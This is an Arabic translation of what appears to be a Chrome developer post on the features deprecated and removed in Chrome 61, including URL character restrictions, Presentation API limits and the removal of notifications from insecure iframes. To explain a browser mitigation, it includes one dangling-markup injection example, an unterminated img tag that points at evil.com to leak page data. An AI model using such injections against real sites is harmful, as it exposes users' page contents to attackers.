في كل إصدار من Chrome تقريبًا، نلاحظ عددًا كبيرًا من التحديثات والتحسينات على المنتج وأدائه وإمكانات Web Platform. توضّح هذه المقالة الميزات التي سيتم إيقافها نهائيًا وإزالتها في الإصدار 61 من Chrome، الذي أصبح متاحًا في إصدار تجريبي اعتبارًا من 3 آب (أغسطس). تخضع هذه القائمة للتغيير في أي وقت.
الأمان والخصوصية
حظر الموارد التي تحتوي عناوين URL الخاصة بها على حرفَي "\n" و"<'
هناك نوع من الاختراق يُعرف باسم إدخال ترميز غير مكتمل، ويتم فيه استخدام عنوان URL
مقتطع لإرسال البيانات إلى نقطة نهاية خارجية. على سبيل المثال،
لنفترض أنّ الصفحة تحتوي على <img src='https://evil.com/?. بما أنّ عنوان URL لا يحتوي على
علامة اقتباس إغلاق، ستقرأ المتصفّحات علامة الاقتباس التالية التي تظهر وتتعامل مع
الأحرف المضمّنة كما لو كانت عنوان URL واحدًا.
يحدّ الإصدار 61 من Chrome من هذه الثغرة الأمنية من خلال تقييد مجموعات الأحرف
المسموحة في سمتَي href وsrc. على وجه التحديد، سيتوقف Chrome عن
معالجة عناوين URL عند العثور على أحرف سطر جديد (\n) وأقل من
أحرف (<).
على المطوّرين الذين لديهم حالة استخدام مشروعية لسطر جديد وأقل من 128 حرفًا في عنوان URL استخدام ترميز بدلاً من هذه الأحرف.
Intent to Remove | Chromestatus Tracker | Chromium Bug
إيقاف Presentation API نهائيًا وإزالتها من السياقات غير الآمنة
تبيّن أنّه يمكن استخدام Presentation API كأحد أدوات هجوم على المصادر غير الآمنة. بما أنّ الشاشات لا تحتوي على أشرطة عناوين، يمكن استخدام واجهة برمجة التطبيقات لتزييف المحتوى. من الممكن أيضًا استخراج البيانات من العرض التقديمي الجاري.
بما يتوافق مع نية Blink في إزالة الميزات القوية من المصادر غير الآمنة، نخطّط لإيقاف Presentation API نهائيًا
وإزالة إمكانية استخدامها في السياقات غير الآمنة. بدءًا من الإصدار 61 من Chrome، لن تعمل PresentationRequest.start() على مصادر غير آمنة.
Intent to Remove | Chromestatus Tracker | Chromium Bug
JavaScript
عدم السماح بتحديد المواقع المفهرَسة على النوافذ
في السابق، كانت بعض المتصفّحات تسمح بعمليات تعيين JavaScript مثل ما يلي:
window[0] = 1;
تشير ملاحظات مواصفات HTML الحالية إلى أنّ هذا الإجراء يشكّل انتهاكًا صريحًا لمواصفات JavaScript. ولهذا السبب، تمت إزالة هذه الميزة في الإصدار 61 من Chrome. اعتبارًا من شباط (فبراير) 2016، أصبح متصفّح Firefox متوافقًا.
إزالة استخدام الإشعارات من إطارات iframe غير الآمنة
يمكن أن تؤدي طلبات الأذونات الواردة من إطارات iframe إلى إرباك المستخدمين لأنّه من الصعب التمييز بين مصدر الصفحة التي تتضمّن الإطار ومصادر إطار iframe الذي يقدّم الطلب. عندما يكون نطاق الطلبات غير واضح، يصعب على المستخدمين الحكم على ما إذا كانوا يريدون منح الإذن أو رفضه.
سيؤدي حظر الإشعارات في إطارات iframe أيضًا إلى مواءمة متطلبات إذن الإشعارات مع متطلبات الإشعارات الفورية، ما يسهّل على المطوّرين استخدامها.
يمكن للمطوّرين الذين يحتاجون إلى هذه الوظيفة فتح نافذة جديدة لطلب إذن إرسال الإشعارات.